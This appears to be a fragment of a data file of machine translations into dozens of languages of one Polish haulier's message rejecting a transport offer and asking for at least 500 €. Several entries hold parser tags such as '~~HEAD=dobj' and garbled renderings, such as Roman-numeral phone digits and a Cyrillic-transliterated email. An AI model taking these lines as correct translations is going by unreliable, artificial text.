				"Tämä tarjous ei ole hyväksyttävissä. Pyydän teitä nostamaan määrä vähintään 500 €. Lautta ratsastaa maksaa minulle vähintään puolet ehdotettu osuus (maksetaan etukäteen). Kuljettajan on GPS-paikannus, rekisterinumero DW29911. Ole hyvä palaute mojemail@emailowo.com tai kontaktia http://randomwebsite.com/cgi-bin/random.pl. Puhelinnumero +48 (71) 722 11 10. Yritys Transport & Transportowo sp. sp. k.",
				"Cette offre est inacceptable. Je voudrais vous demander d'augmenter le montant d'un minimum de 500 €. Manèges Ferry vont me coûter au moins la moitié du taux proposé (payé à l'avance). Le pilote a suivi GPS, numéro d'enregistrement DW29911. Please évaluations mojemail@emailowo.com ou de contact par le http://randomwebsite.com/cgi-bin/random.pl. Numéro de téléphone +48 (71) 722 11 10. Société Transport & Transportowo sp. sp. k.",
				"Esta oferta non é aceptable. Pídolle para levantar a cantidade a un mínimo de 500 €. Paseos de ferry me vai custar, polo menos, a metade da taxa proposto (pago por adiantado). O condutor ten de seguimento GPS, número de rexistro DW29911. Agradar o producto mojemail@emailowo.com ou póñase en contacto polo http://randomwebsite.com/cgi-bin/random.pl. Número de teléfono +48 (71) 722 11 10 Transportes e Transportowo Empresa sp. sp. k.",
				"ეს შეთავაზება არ არის მისაღები. მინდა გთხოვოთ, ამაღლება თანხა მინიმუმ 500 €. Ferry ჩავა ეღირება ჩემთვის მინიმუმ ნახევარი შემოთავაზებული კურსი (გადახდა წინასწარ). მძღოლი GPS ნავიგაციის, რეგისტრაციის ნომერი DW29911. გთხოვთ, გამოხმაურება mojemail@emailowo.com ან კონტაქტის მიერ http://randomwebsite.com/cgi-bin/random.pl. ტელეფონი +48 (71) 722 11 10. სატრანსპორტო კომპანია & Transportowo sp. sp. k.",
				"Dieses Angebot ist nicht akzeptabel. Ich möchte Sie bitten, den Betrag auf ein Minimum von 500 € zu erhöhen. Fährfahrten kostet mich mindestens die Hälfte der angegebenen Preis (im Voraus bezahlt). Der Fahrer hat GPS-Tracking, Registriernummer DW29911. Bitte Feedback mojemail@emailowo.com oder Kontakt durch die http://randomwebsite.com/cgi-bin/random.pl. Telefonnummer +48 (71) 722 11 10. Unternehmen Transport & Transportowo sp. sp. k.",
				"Αυτή η προσφορά δεν είναι αποδεκτή. Θα ήθελα να σας ζητήσω να αυξήσει το ποσό στο ελάχιστο των 500 €. Βόλτες με πλοίο θα μου κοστίσει τουλάχιστον το ήμισυ προτεινόμενο ποσοστό (καταβληθεί εκ των προτέρων). Ο οδηγός έχει εντοπισμού GPS, αριθμός μητρώου DW29911. Παρακαλούμε ενημερώστε mojemail@emailowo.com ή επικοινωνήστε με τον http://randomwebsite.com/cgi-bin/random.pl. Αριθμός τηλεφώνου +48 (71) 722 11 10. Εταιρεία Μεταφορών & Transportowo sp. sp. k.",
				"આ ઓફર સ્વીકાર્ય નથી. હું 500 € ઓછામાં ઓછા જથ્થો વધારવા માટે તમે પૂછો છો. ફેરી સવારી મને (અગાઉથી ચૂકવણી) ઓછામાં ઓછા અડધો સૂચિત દર ખર્ચ થશે. ડ્રાઈવર GPS ટ્રેકિંગ, નોંધણી નંબર DW29911 છે. આ http://randomwebsite.com/cgi-bin/random.pl દ્વારા અભિપ્રાય mojemail@emailowo.com અથવા સંપર્ક કરો. ફોન નંબર +48 (71) 722 11 10. કંપની ટ્રાન્સપોર્ટ એન્ડ Transportowo એસપી. એસપી. k.",
				"Òf Sa a se pa akseptab. Mwen ta mande w ogmante kantite lajan an nan yon minimòm nan 500 €. Parcours Ferry ap koute m 'omwen mwatye pousantaj yo pwopoze a (peye nan avanse). Chofè a gen swiv GPS, DW29911 nimewo enskripsyon an. Tanpri fidbak mojemail@emailowo.com ou kontakte pa http://randomwebsite.com/cgi-bin/random.pl la. Nimewo telefòn +48 (71) 722 11 10. Konpayi Transpò & Transportowo SP. SP. k.",
				"Wannan tayin bai yarda. Ina tambayar ka tada adadin zuwa m na 500 €. Jirgin fito tafiye-tafiye zai kudin da ni a kalla rabin samarwa kudi (ya biya a gaba). Da direba yana da GPS tracking, rajista yawan DW29911. Yardar da feedback mojemail@emailowo.com ko lamba da http://randomwebsite.com/cgi-bin/random.pl. Lambar waya +48 (71) 722 11 10. Company sufuri & Transportowo sp. sp. k.",
				"הצעה זו אינה מקובלת. אבקשך להעלות את הכמות עד למינימום של 500 €. רוכב מעבורת יעלה לי לפחות חצי שיעור המוצע (בתשלום מראש). יש נהג מעקב GPS, DW29911 מספר הרישום. אנא משוב mojemail@emailowo.com או מגע על ידי http://randomwebsite.com/cgi-bin/random.pl. מספר טלפון: +48 (71) 722 11 10. sp חברת התחבורה וTransportowo. sp. k.",
				"इस प्रस्ताव को स्वीकार्य नहीं है। मैं 500 € की एक न्यूनतम राशि को बढ़ाने के लिए आप से पूछना होगा। नौका की सवारी मुझे (अग्रिम भुगतान) कम से कम आधा प्रस्तावित दर खर्च होंगे। चालक जीपीएस ट्रैकिंग, पंजीकरण संख्या DW29911 है। Http://randomwebsite.com/cgi-bin/random.pl द्वारा प्रतिक्रिया mojemail@emailowo.com या संपर्क करें। फ़ोन नंबर 48 (71) 722 11 10 कंपनी परिवहन और Transportowo सपा। सपा। कश्मीर।",
				"Ez az ajánlat nem elfogadható. Azt szeretném kérni, hogy emelje az összeget, minimum 500 €. Komptúrákat nekem kerülni legalább fele javasolt mértéke (előre fizetendő). A pilótának GPS nyomkövető, regisztrációs szám DW29911. Kérjük, visszajelzés mojemail@emailowo.com, vagy forduljon az http://randomwebsite.com/cgi-bin/random.pl. Telefonszám +48 (71) 722 11 10. Társaság Szállítás és Transportowo sp. sp. k.",
				"Þetta tilboð er ekki ásættanlegt. Ég myndi biðja þig um að hækka upphæðina sem á að lágmarki 500 €. Ferry ríður mun kosta mig að minnsta kosti helmingi fyrirhugaða hlutfall (greitt fyrirfram). Ökumaðurinn hefur GPS mælingar, skráningarnúmer DW29911. Vinsamlegast athugasemdir mojemail@emailowo.com~~HEAD=dobj eða hafðu samband með því http://randomwebsite.com/cgi-bin/random.pl~~pobj. Símanúmer +48 (71) 722 11 10. Company Transport & Transportowo SP. SP. k.",
				"A na-enye adịghị anakwere. M ga-ajụ gị ka ịkpọlite ​​ndị ego na nke kacha nta nke 500 €. Ugbo agafe ga-eri m dịkarịa ala, ọkara ndị chọrọ ọnụego (akwụ ụgwọ na tupu). The ọkwọ ụgbọala GPS nsuso, registration nọmba DW29911. Ime nzaghachi mojemail@emailowo.com ma ọ bụ kọntaktị site http://randomwebsite.com/cgi-bin/random.pl. Nọmba ekwentị +48 (71) 722 11 10. Company Transport & Transportowo sp. sp. k.",
				"Penawaran ini tidak dapat diterima. Saya akan meminta Anda untuk meningkatkan jumlah yang minimal 500 €. Ferry wahana akan saya biaya setidaknya setengah tingkat diusulkan (dibayar di muka). Pengemudi memiliki pelacakan GPS, nomor registrasi DW29911. Silahkan umpan balik mojemail@emailowo.com atau kontak dengan http://randomwebsite.com/cgi-bin/random.pl tersebut. Nomor telepon +48 (71) 722 11 10. Perusahaan Transportasi & Transportowo sp. sp. k.",
				"Ní hé seo an tairiscint inghlactha. Ba mhaith liom a iarraidh ort an méid a ardú go dtí ar a laghad de 500 €. Beidh turais farantóireachta costas dom ar a laghad, leath an ráta atá molta (íoctha roimh ré). Tá an tiománaí rianú GPS, uimhir chláraithe DW29911. Cuir Aiseolas mojemail@emailowo.com nó téigh i dteagmháil leis an http://randomwebsite.com/cgi-bin/random.pl. Uimhir Fón +48 (71) 722 11 10. Iompar Cuideachta & Transportowo sp. Sp. k.",
				"Questa offerta non è accettabile. Vi chiedo di aumentare l'importo di un minimo di 500 €. Gite in traghetto mi costerà almeno la metà del tasso proposto (pagato in anticipo). Il conducente ha tracking GPS, numero di registrazione DW29911. Prego le risposte mojemail@emailowo.com o contatto da parte del http://randomwebsite.com/cgi-bin/random.pl. Numero di telefono +48 (71) 722 11 10. Società Trasporti e Transportowo sp. sp. k.",
				"このオファーは受け入れられません。私は500€の最低限の量を上げるように頼むことになります。フェリーの乗り物は私に（先払い）少なくとも半分提案レートの費用がかかります。ドライバは、GPS追跡、登録番号DW29911を有します。 http://randomwebsite.com/cgi-bin/random.plによるフィードバックmojemail@emailowo.comまたは接触をしてください。電話番号+48（71）722 11 10会社トランスポート＆Transportowoエスピー。 SP。K。",
				"Nawarake proyek iki ora ditrima. Aku takon sampeyan kanggo mundhakaken jumlah minimal 500 €. Ferry nitih bakal biaya kula ing paling setengah tingkat ngajokaken (mbayar in advance). Driver wis ranging GPS, nomer Pendhaftaran DW29911. Please saran mojemail@emailowo.com utawa kontak kanthi http://randomwebsite.com/cgi-bin/random.pl ing. Nomer telpon +48 (71) 722 11 10. Company Transport & Transportowo sp. sp. k.",
				"ಈ ಪ್ರಸ್ತಾಪವನ್ನು ಸಮ್ಮತವಲ್ಲ. ನಾನು 500 € ಕನಿಷ್ಠ ಪ್ರಮಾಣದ ಸಂಗ್ರಹಿಸಲು ನೀವು ಕೇಳುವಿರಿ. ಫೆರ್ರಿ ಸವಾರಿ ನನಗೆ (ಮುಂಗಡವಾಗಿ) ಅರ್ಧದಷ್ಟಾದರೂ ಪ್ರಸ್ತಾವಿತ ದರ ವೆಚ್ಚವಾಗಲಿದೆ. ಚಾಲಕ ಜಿಪಿಎಸ್, ನೋಂದಣಿ ಸಂಖ್ಯೆ DW29911 ಹೊಂದಿದೆ. Http://randomwebsite.com/cgi-bin/random.pl ಪ್ರತಿಕ್ರಿಯೆಗೆ mojemail@emailowo.com ಅಥವಾ ಸಂಪರ್ಕಿಸಿ. ದೂರವಾಣಿ ಸಂಖ್ಯೆ +48 (71) 722 11 10. ಕಂಪನಿ ಸಾರಿಗೆ ಮತ್ತು Transportowo ಎಸ್ಪಿ. ಎಸ್ಪಿ. ಕೆ.",
				"Бұл ұсыныс қолайлы емес. Мен 500 € кем дегенде соманы арттыру сұраймын еді. Ferry аттракциондары, кем дегенде (алдын ала төленген) жартысынан ұсынылған мөлшерлемесін мені тұрады. жүргізуші GPS қадағалау, тіркеу нөмірі DW29911 бар. Http://randomwebsite.com/cgi-bin/random.pl арқылы кері байланыс mojemail@emailowo.com немесе хабарласыңыз. Телефон нөмірін +48 (71) 722 11 10. Қоғам Көлік және Transportowo Sp. Sp. к.",
				"이 제안은 허용되지 않습니다. 나는 500 €의 최소 금액을 인상하도록 요청할 것입니다. 페리를 타고 나에게 (선불) 적어도 절반 제안 된 속도를 요할 것이다. 드라이버는 GPS 추적, 등록 번호 DW29911 있습니다. http://randomwebsite.com/cgi-bin/random.pl에 의한 피드백 mojemail@emailowo.com 또는 연락을 주시기 바랍니다. 전화 번호 : +48 (71) 722 (11) (10) 회사의 운송 및 Transportowo SP. SP. K.",
				"ການ​ສະ​ເຫນີ​ນີ້​ແມ່ນ​ຍອມ​ຮັບ​ບໍ່​ໄດ້​. ຂ້າ​ພະ​ເຈົ້າ​ຈະ​ຮ້ອງ​ຂໍ​ໃຫ້​ທ່ານ​ຍົກ​ສູງ​ບົດ​ບາດ​ຈໍາ​ນວນ​ທີ່​ຕໍາ​່​ສຸດ​ທີ່​ຂອງ 500 €​ໄດ້​. ການ​ຂັບ​ເຄື່ອນ ferry ຈະ​ມີ​ລາ​ຄາ​ຖືກ​ຂ້າ​ພະ​ເຈົ້າ​ຢູ່​ຢ່າງ​ຫນ້ອຍ​ເຄິ່ງ​ຫນຶ່ງ​ຂອງ​ອັດ​ຕາ​ການ​ສະ​ເຫນີ (ຈ່າຍ​ລ່ວງ​ຫນ້າ​)​. ຄົນ​ຂັບ​ທີ່​ມີ GPS ຕິດ​ຕາມ​, DW29911 ຈໍາ​ນວນ​ການ​ຈົດ​ທະ​ບຽນ​. ກະ​ລຸ​ນາ​ຕໍາ​ນິ​ຕິ​ຊົມ mojemail@emailowo.com ຫຼື​ຕິດ​ຕໍ່​ໂດຍ http://randomwebsite.com/cgi-bin/random.pl ໄດ້​. ເບີ​ໂທລະ​ສັບ +48 (71​) 722 11 10 ການ​ຂົນ​ສົ່ງ​ຂອງ​ບໍ​ລິ​ສັດ & Transportowo sp​. sp​. k​.",
				"Haec oratio non acceptum. Rogo attollere moles minimum D €. Ferry rides periculo me saltem dimidium proposita rate (solvit in antecessum). Mulio habet GPS semita, registration numerum DW29911. Placere feedback mojemail@emailowo.com contagione per http://randomwebsite.com/cgi-bin/random.pl. Phone numerus XLVIII (LXXI) DCCXXII XI 10. Transport Company Transportowo & sp. sp. k.",
				"Šis piedāvājums nav pieņemams. Es gribētu jūs lūgt palielināt summu, kas nav mazāks par 500 €. Prāmju braucieni maksās man vismaz puse piedāvāto likmi (samaksāts avansā). Vadītājam ir GPS sekošanas, reģistrācijas numurs DW29911. Lūdzu atsauksmes mojemail@emailowo.com~~HEAD=dobj vai saskare ar http://randomwebsite.com/cgi-bin/random.pl~~pobj. Tālruņa numurs +48 (71) 722 11 10. Uzņēmuma Transport & Transportowo sp. sp. k.",
				"Šis pasiūlymas yra nepriimtinas. Norėčiau paprašyti jus pakelti sumą nuo 500 € minimumo. Keltų važiuoja kainuos man bent pusę normą (mokama iš anksto). Vairuotojas turi GPS sekimo, registracijos numeris DW29911. Prašome atsiliepimus mojemail@emailowo.com~~HEAD=dobj ar kontaktuos su http://randomwebsite.com/cgi-bin/random.pl~~pobj. Telefono numeris: +48 (71) 722 11 10. Bendrovė Transporto ir transportą Sp. Sp. k.",
				"Оваа понуда не е прифатливо. Јас ќе ве замолам да се подигне износот на минимум од 500 €. Ферибот вози ќе ме чини најмалку половина од предложените стапка (плаќа однапред). Возачот има GPS следење, регистарски број DW29911. Молам mojemail@emailowo.com повратни информации или контактирајте со http://randomwebsite.com/cgi-bin/random.pl. Телефонски број +48 (71) 722 11 10. Друштвото за транспорт и Transportowo СП. sp. к.",
				"Ity tolotra tsy azo ekena. Manontany anareo aho mba hanangana ny vola ho faran'izay kely ny 500 €. Mitaingina sambo dia lany ihany na dia ny antsasaky ny volavolan-taha (karama mialoha). Ny mpamily no GPS ampy, fisoratana anarana DW29911 maro. Sitraka tamberina mojemail@emailowo.com na fifandraisana amin'ny http://randomwebsite.com/cgi-bin/random.pl. Phone isa +48 (71) 11 722 10. Company Fitaterana & Transportowo sp. sp. l.",
				"Tawaran ini tidak boleh diterima. Saya akan meminta anda untuk meningkatkan jumlah yang sekurang-kurangnya 500 €. Perjalanan feri akan kos saya sekurang-kurangnya separuh daripada kadar yang dicadangkan (dibayar terlebih dahulu). Pemandu mempunyai pengesanan GPS, nombor pendaftaran DW29911. Sila maklum balas mojemail@emailowo.com atau kenalan dengan http://randomwebsite.com/cgi-bin/random.pl itu. Nombor telefon +48 (71) 722 11 10. Syarikat Pengangkutan & Transportowo sp. sp. k.",
				"ഈ ഓഫർ സ്വീകാര്യമല്ല. ഞാൻ 500 € ഒരു മിനിമം തുക ഉയർത്താൻ നിങ്ങളോട് ചോദിക്കും. ഫെറി റൈഡുകൾ കുറഞ്ഞത് (മുൻകൂറായി അടച്ച) പകുതി നിർദിഷ്ട നിരക്ക് എന്നെ നിര ചെയ്യും. ഡ്രൈവർ ജിപിഎസ് ട്രാക്കിംഗ്, രജിസ്ട്രേഷൻ നമ്പർ DW29911 ഉണ്ട്. Http://randomwebsite.com/cgi-bin/random.pl എന്നയാളുടെ ഫീഡ്ബാക്ക് mojemail@emailowo.com അല്ലെങ്കിൽ ബന്ധപ്പെടുക. ഫോൺ നമ്പർ +48 (71) 722 11 10. കമ്പനി ഗതാഗത Transportowo എസ്പി. എസ്പി. k.",
				"Din l-offerta mhix aċċettabbli. Nixtieq nitolbok biex jgħollu l-ammont għal minimu ta '500 €. Karozzini laneċ se jiswieli mill-inqas nofs ir-rata proposta (imħallsa bil-quddiem). Is-sewwieq għandu GPS tracking, numru ta 'reġistrazzjoni DW29911. Jekk jogħġbok feedback mojemail@emailowo.com jew kuntatt mill-http://randomwebsite.com/cgi-bin/random.pl. Numru tat-telefon +48 (71) 722 11 10. Trasport Company & Transportowo sp. sp. k.",
				"E kore e manakohia tenei tuku. E ui ki a koutou ki te whakaara i te nui ki te iti o te 500 €. Ka utua ekenga Ferry ahau i te iti rawa te hawhe te auau whakaarohia (utua i mua). Ko te atekōkiri GPS aroturuki, te tau rēhita DW29911. Te pai urupare mojemail@emailowo.com whakapā ranei i te http://randomwebsite.com/cgi-bin/random.pl. Tau Waea +48 (71) 722 11 10. Company Transport & Transportowo sp. sp. k.",
				"ही ऑफर मान्य नाही. मी 500 € किमान रक्कम वाढवण्याची तुम्ही विचाराल. फेरी अगोदर नोंदणी केल्यास मिळू मला (आगाऊ अदा) किमान अर्धा प्रस्तावित दर खर्च होईल. ड्राइव्हर जीपीएस ट्रॅकिंग, नोंदणी क्रमांक DW29911 आहे. Http://randomwebsite.com/cgi-bin/random.pl करून अभिप्राय mojemail@emailowo.com किंवा संपर्क करा. फोन नंबर +48 (71) 722 11 10. कंपनी वाहतूक Transportowo एसपी. एसपी. के.",
				"Энэ нь санал хүлээн авахгүй болно. Би 500 € нь хамгийн бага хэмжээг нэмэгдүүлэх асуух болно. Ferry аялдаг надад (урьдчилан төлсөн) дор хаяж тал хувь нь санал болгосон хэмжээг үнэтэй байна. Драйвер нь GPS-ийн хянах, регистрийн дугаар DW29911 байна. Http://randomwebsite.com/cgi-bin/random.pl~~pobj тус санал mojemail@emailowo.com, эсвэл холбоо барина уу. Утасны дугаар +48 (71) 722 11 10. Компани Тээвэр & Transportowo SP. SP. к.",
				"यो प्रस्ताव स्वीकार्य छैन। म 500 € एक न्यूनतम राशि हुर्काउन प्रश्न सोध्न तपाईं हुनेछ। डुङ्गा सवारी मलाई (अग्रिम भुक्तानी) कम्तिमा आधा प्रस्तावित दर खर्च हुनेछ। ड्राइभर जीपीएस ट्रयाकिङ, दर्ता नम्बर DW29911 छ। यो http://randomwebsite.com/cgi-bin/random.pl द्वारा प्रतिक्रिया mojemail@emailowo.com वा सम्पर्क गर्नुहोस्। फोन नम्बर: +48 (71) 722 11 10 कम्पनी परिवहन Transportowo सपा। सपा। K।",
				"Dette tilbudet er ikke akseptabelt. Jeg vil be deg om å heve beløpet til et minimum på 500 €. Fergeturer vil koste meg minst halvparten av foreslåtte rate (betales på forhånd). Sjåføren har GPS-sporing, registreringsnummer DW29911. Vennligst tilbakemeldinger mojemail@emailowo.com eller ta kontakt med http://randomwebsite.com/cgi-bin/random.pl. Telefonnummer +48 (71) 722 11 10. Selskapet Transport og Transportowo sp. sp. k.",
				"این پیشنهاد قابل قبول نیست. از شما می خواهم برای بالا بردن مقدار به حداقل 500 €. سواری فری من حداقل نیمی از نرخ پیشنهادی (پرداخت در پیشبرد) هزینه. این درایور ردیابی GPS، شماره ثبت DW29911. لطفا انتقادات و پیشنهادات mojemail@emailowo.com و یا تماس با توسط http://randomwebsite.com/cgi-bin/random.pl. شماره تلفن +48 (71) 722 11 10. شرکت حمل و نقل و Transportowo SP. SP. K.",
				"Ta oferta jest nie do zaakceptowania. Prosiłbym o podniesienie kwoty do min 500€. Przejazdy promowe będą mnie kosztować przynajmniej 1/2 proponowanej stawki (płatne z góry). Kierowca ma tracking GPS, numer rejestracyjny DW29911. Proszę o informację zwrotną na mojemail@emailowo.com lub kontakt przez stronę http://randomwebsite.com/cgi-bin/random.pl. Numer telefonu stacjonarnego +48 (71) 722 11 10. Firma Transport&Transportowo sp. z o.o. sp. k.",
				"Esta oferta não é aceitável. Peço-lhe para levantar a quantia a um mínimo de 500 €. Passeios de ferry vai me custar, pelo menos, metade da taxa proposto (pago antecipadamente). O motorista tem de rastreamento GPS, número de registo DW29911. Agradar o feedback mojemail@emailowo.com ou entre em contato pelo http://randomwebsite.com/cgi-bin/random.pl. Número de telefone +48 (71) 722 11 10. Transportes e Transportowo Empresa sp. sp. k.",
				"Esta oferta não é aceitável. Peço-lhe para levantar a quantia a um mínimo de 500 €. Passeios de ferry vai me custar, pelo menos, metade da taxa proposto (pago antecipadamente). O motorista tem de rastreamento GPS, número de registo DW29911. Agradar o feedback mojemail@emailowo.com ou entre em contato pelo http://randomwebsite.com/cgi-bin/random.pl. Número de telefone +48 (71) 722 11 10. Transportes e Transportowo Empresa sp. sp. k.",
				"ਇਹ ਪੇਸ਼ਕਸ਼ ਨੂੰ ਸਵੀਕਾਰ ਨਹੀ ਹੈ. ਮੈਨੂੰ 500 € ਦੀ ਇੱਕ ਘੱਟੋ ਘੱਟ ਕਰਨ ਲਈ ਰਕਮ ਨੂੰ ਇਕੱਠਾ ਕਰਨ ਲਈ ਤੁਹਾਨੂੰ ਕਹਿਣਗੇ. ਬੇੜੀ ਸਫਰ ਮੈਨੂੰ (ਪੇਸ਼ਗੀ ਵਿੱਚ ਭੁਗਤਾਨ) 'ਤੇ ਘੱਟੋ ਘੱਟ ਅੱਧਾ ਪ੍ਰਸਤਾਵਿਤ ਦਰ ਨੂੰ ਖ਼ਰਚ ਕਰੇਗਾ. ਡਰਾਈਵਰ GPS ਟਰੈਕਿੰਗ, ਰਜਿਸਟਰੇਸ਼ਨ ਨੰਬਰ DW29911 ਹੈ. Http://randomwebsite.com/cgi-bin/random.pl ਕੇ ਫੀਡਬੈਕ mojemail@emailowo.com ਜ ਨਾਲ ਸੰਪਰਕ ਕਰੋ. ਫੋਨ ਨੰਬਰ +48 (71) 722 11 10. ਕੰਪਨੀ ਆਵਾਜਾਈ ਅਤੇ Transportowo ਸਮਾਜਵਾਦੀ. ਐਸਪੀ. k.",
				"Aceasta oferta nu este acceptabil. V-aș ruga să ridice suma la un minim de 500 €. Plimbari cu feribotul mă va costa cel puțin jumătate din rata propusă (plătită în avans). Conducătorul auto are de urmărire GPS, numărul de înregistrare DW29911. Vă rugăm să feedback-ul mojemail@emailowo.com sau contact de http://randomwebsite.com/cgi-bin/random.pl~~state=definite. Numărul de telefon al 48 (71) 722 11 10. Compania de Transport si Transportowo sp. sp. k.",
				"Это предложение не является приемлемым. Я хотел бы попросить вас, чтобы поднять сумму минимум 500 €. На пароме будет стоить мне по крайней мере половину предложенного скорость (оплачивается заранее). Водитель имеет GPS слежения, регистрационный номер DW29911. Пожалуйста, обратная связь mojemail@emailowo.com~~HEAD=dobj или Обращаться по http://randomwebsite.com/cgi-bin/random.pl~~pobj. Телефон +48 (71) 722 11 10. Компания Транспорт & Transportowo зр. зр. к.",
				"Ова понуда није прихватљива. Замолио бих вас да се подигне износ од најмање 500 евра. Ферри вожње ће ме коштати најмање пола предложени стопу (плаћа унапред). Возач има ГПС праћење, матични број ДВ29911. Плеасе повратне информације мојемаил@емаилово.цом~~ХЕАД=добј или контактирајте путем хттп://рандомвебсите.цом/цги-бин/рандом.пл~~побј. Телефон: +48 (71) 722 11 10. Фирма Транспорт и Транспортово Сп. К сп..",
				"මෙම පිරිනැමීම පිළිගත හැකි නො වේ. මම 500 € ක අවම කිරීමට එම මුදල වැඩි කිරීමට ඔබ අසනු ඇත. තොටුපොළ ලෙෂර් වර්ල්ඞ් උද්යානයේ අවම වශයෙන් (කල්තියා ගෙවා) අර්ධ යෝජිත අනුපාතය මට වැය වේ. රථයේ රියදුරු GPS tracking, ලියාපදිංචි අංකය DW29911 ඇත. මෙම http://randomwebsite.com/cgi-bin/random.pl විසින් ප්රතිචාර mojemail@emailowo.com හෝ සම්බන්ධ වන්න. දුරකතන අංකය පෙන්වන්න +48 (71) 722 11 10. සමාගම ප්රවාහන සහ Transportowo sp. පොලිස් අධිකාරී. ඔ.",
				"Táto ponuka nie je prijateľné. Chcel by som vás požiadať, aby ste k zvýšeniu sumy, ktorá má minimálne 500 €. Ferry jazdy ma bude stáť najmenej polovicu navrhovanej sadzby (platí sa vopred). Vodič má GPS sledovanie, registračné číslo DW29911. Prosím, spätnú väzbu mojemail@emailowo.com~~HEAD=dobj alebo kontakt na http://randomwebsite.com/cgi-bin/random.pl~~pobj. Telefónne číslo +48 (71) 722 11 10. Spoločnosť Transport & Transportowo sp. sp. k.",
				"Ta ponudba ni sprejemljiva. Prosil bi vas, da se zviša na najmanj 500 €. Trajektne vožnja me bo stalo vsaj polovico predlagano stopnjo (plačano vnaprej). Voznik ima GPS sledenje, registrska številka DW29911. Prosimo, povratne mojemail@emailowo.com~~HEAD=dobj ali stik s strani http://randomwebsite.com/cgi-bin/random.pl~~pobj. Telefonska številka 48 (71) 722 11 10. Podjetje Transport & Transportowo sp. sp. K.",
				"Tani dalab aan la aqbali karin. Waxaan ku weydiin lahaa in aad kor u xaddiga in ugu yaraan 500 €. Raacid Ferry igu kici doonaa ugu yaraan kala bar heerka la soo jeediyay (bixiyey ka hor). Darawalku uu ku raadraaca GPS, lambarka diiwaangelinta DW29911. Fadlan feedback mojemail@emailowo.com ama la xiriir by http://randomwebsite.com/cgi-bin/random.pl ah. Lambarka taleefoonka +48 (71) 722 11 10. Company Gaadiidka & Transportowo sp. sp. k.",
				"Esta oferta no es aceptable. Yo pediría que aumentar la cantidad hasta un mínimo de 500 €. Paseos en ferry me va a costar al menos la mitad de la tasa propuesta (pagado por adelantado). El conductor tiene la localización por GPS, número de registro DW29911. Por favor la regeneración mojemail@emailowo.com o contacto por el http://randomwebsite.com/cgi-bin/random.pl. Teléfono +48 (71) 722 11 10. Transporte y Transportowo Compañía sp. sp. k.",
				"Esta oferta no es aceptable. Yo pediría que aumentar la cantidad hasta un mínimo de 500 €. Paseos en ferry me va a costar al menos la mitad de la tasa propuesta (pagado por adelantado). El conductor tiene la localización por GPS, número de registro DW29911. Por favor la regeneración mojemail@emailowo.com o contacto por el http://randomwebsite.com/cgi-bin/random.pl. Teléfono +48 (71) 722 11 10. Transporte y Transportowo Compañía sp. sp. k.",
				"Panawaran ieu teu bisa ditarima. Mah tangtu nanya pikeun ngangkat jumlah ka minimum 500 €. Ferry rides bakal ngarugikeun mah sahenteuna satengah laju diusulkeun (dibayar sateuacanna). Supir geus tracking GPS, nomor registrasi DW29911. Mangga feedback mojemail@emailowo.com atawa kontak ku http://randomwebsite.com/cgi-bin/random.pl nu. Phone jumlah +48 (71) 722 11 10. Company Transport & Transportowo sp. sp. k.",
				"Kutoa hii haikubaliki. Napenda kuuliza kuongeza kiasi kwa kiwango cha chini ya 500 €. Umesimama kivuko cha gharama mimi angalau nusu ya kiwango cha mapendekezo (kulipwa mapema). Dereva ana GPS kufuatilia, namba za usajili DW29911. Tafadhali maoni mojemail@emailowo.com au kuwasiliana na http://randomwebsite.com/cgi-bin/random.pl. Namba ya Simu +48 (71) 722 11 10. Kampuni Usafiri & Transportowo sp. sp. k.",
				"Detta erbjudande är inte acceptabelt. Jag skulle vilja be er att höja beloppet till minst 500 €. Färja rider kommer att kosta mig åtminstone hälften av den föreslagna procentsatsen (betalas i förskott). Föraren har GPS-spårning, registreringsnummer DW29911. Vänligen återkoppling mojemail@emailowo.com eller kontakt med http://randomwebsite.com/cgi-bin/random.pl. Telefonnummer +48 (71) 722 11 10. Företaget Transport & Transportowo sp. sp. k.",
				"Ин пешниҳод аст, қобили қабул намебошад. Ман аз шумо барои баланд бардоштани њаљми на камтар аз 500 €. Ҳамгаро паром маро на камтар аз нисфи меъёри пешниҳодшуда (пешакӣ пардохт) арзиш дорад. Ронанда дорад пайгирии GPS, рақами бақайдгирии DW29911. Писанд фикру mojemail@emailowo.com ё тамос аз тарафи http://randomwebsite.com/cgi-bin/random.pl. Рақами телефони +48 (71) 722 11 10. Ширкати Нақлиёт & Transportowo SP. SP. К.",
				"இந்த வாய்ப்பை ஏற்கத்தக்கது அல்ல. நான் 500 € ஒரு குறைந்தபட்ச அளவு உயர்த்த உங்களை கேட்க வேண்டும். படகு சவாரிகள் என்னை (முன்கூட்டியே பணம்) குறைந்தது அரை உத்தேச விகிதம் செலவாகும். இயக்கி ஜிபிஎஸ் டிராக்கிங், பதிவு எண் DW29911 உள்ளது. Http://randomwebsite.com/cgi-bin/random.pl மூலம் கருத்துக்களை mojemail@emailowo.com அல்லது தொடர்பு கொள்ளவும். தொலைபேசி எண் +48 (71) 722 11 10. நிறுவனத்தின் போக்குவரத்து மற்றும் Transportowo SP. SP. கே.",
				"ఈ ఆఫర్ ఆమోదయోగ్యమైన కాదు. నేను 500 € కనీసం మొత్తాన్ని పెంచడానికి మీరు అడగాలనుకుంటున్నారు. ఫెర్రీ సవారీలు నాకు (ముందుగా చెల్లించిన) కనీసం సగం ప్రతిపాదిత రేటు ఖర్చు. డ్రైవర్ GPS ట్రాకింగ్, రిజిస్ట్రేషన్ నంబర్ DW29911 ఉంది. Http://randomwebsite.com/cgi-bin/random.pl ద్వారా అభిప్రాయాన్ని mojemail@emailowo.com లేదా సంప్రదింపు దయచేసి. ఫోన్ నంబర్ +48 (71) 722 11 10 కంపెనీ రవాణా & Transportowo sp. sp. k.",
				"ข้อเสนอนี้ไม่ได้รับการยอมรับ ฉันจะขอให้คุณเพิ่มจำนวนให้น้อยที่สุด 500 € ขี่เรือข้ามฟากที่จะเสียค่าใช้จ่ายอย่างน้อยครึ่งหนึ่งอัตราที่เสนอ (จ่ายล่วงหน้า) คนขับรถที่มี GPS ติดตามหมายเลขทะเบียน DW29911 กรุณา mojemail@emailowo.com ข้อเสนอแนะหรือติดต่อโดย http://randomwebsite.com/cgi-bin/random.pl หมายเลขโทรศัพท์ 48 (71) 11 722 10. บริษัท ขนส่งและ Transportowo SP Sp. k",
				"Bu teklif kabul edilemez. Ben 500 € 'luk bir asgari tutarı yükseltmek için rica ediyorum. Feribot sürmek bana (peşin ödeme) en az yarısı önerilen oranı mal olacak. Sürücü GPS izleme, kayıt numarası DW29911 vardır. Http://randomwebsite.com/cgi-bin/random.pl~~pobj tarafından geribildirim mojemail@emailowo.com ya da kişiyi Lütfen. Telefon numarası +48 (71) 722 11 10. Şirket Taşıma Transportowo sp. sp. k.",
